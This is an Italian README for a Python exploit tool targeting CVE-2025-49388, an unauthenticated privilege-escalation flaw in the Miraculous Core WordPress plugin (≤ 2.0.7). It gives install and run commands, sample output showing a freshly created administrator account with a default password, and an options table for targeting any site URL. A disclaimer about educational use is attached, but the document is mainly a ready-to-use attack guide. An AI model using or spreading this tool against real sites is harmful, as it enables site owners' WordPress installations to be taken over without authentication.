
Miraculous Core (kamleshyadav) ≤ 2.0.7 — Escalation dei privilegi non autenticata
Il plugin WordPress Miraculous Core Plugin <= 2.0.7 è vulnerabile all'escalation dei privilegi
La vulnerabilità Assegnazione Incorretta dei Privilegi nel plugin Miraculous Core di kamleshyadav consente a utenti non autenticati di aumentare i privilegi e registrare account amministratore.
Versioni affette: dalla n/a alla 2.0.7
CVSS 3.1 CNA di Patchstack:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCVSS NIST: (Valutazione non ancora fornita)
Questo script Python automatizza lo sfruttamento di CVE-2025-49388 registrando un nuovo account amministratore su istanze WordPress vulnerabili con il plugin Miraculous Core installato.
Fornisce elevata affidabilità, randomizza i dati per uno sfruttamento ripetuto affidabile e gestisce automaticamente header, cookie e tentativi di bypass.
Installa le dipendenze:
pip install requests colorama
python CVE-2025-49388.py -u <target-url> [OPZIONI]
Esempio:
python CVE-2025-49388.py -u http://127.0.0.1/wordpress
Nota:
Se ometti nome utente o email, verranno generati valori casuali per ogni esecuzione per evitare errori di duplicazione.
[Nxploited INFO] Target: http://target/wp-admin/admin-ajax.php
[Nxploited INFO] Avvio tentativo di sfruttamento...
[Nxploited SUCCESS] Sfruttamento riuscito! Nxploited By Nxploited
[Nxploited CREDENTIALS]
Username : Nxploited_4pQz1x
Password : Str0ng!Pass123
Email : [email protected]
Questo strumento è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.
Lo sfruttamento non autorizzato di sistemi senza esplicita autorizzazione è illegale e non etico.
L'autore declina ogni responsabilità per uso improprio o danni. Usare in modo responsabile.
| Opzione | Descrizione | Esempio |
|---|
-u, --url | URL WordPress target (obbligatorio) | -u http://target.com/wordpress |
-un, --username | Nome utente desiderato (default: casuale) | -un admin1337 |
-fn, --full_name | Nome completo (default: Nxploited) | -fn "Mario Rossi" |
-em, --useremail | Email (default: casuale) | -em [email protected] |
-pw, --password | Password (default: Str0ng!Pass123) | -pw LaMiaPasswordSegreta! |
-o, --output | Salva i risultati in un file | -o risultato.txt |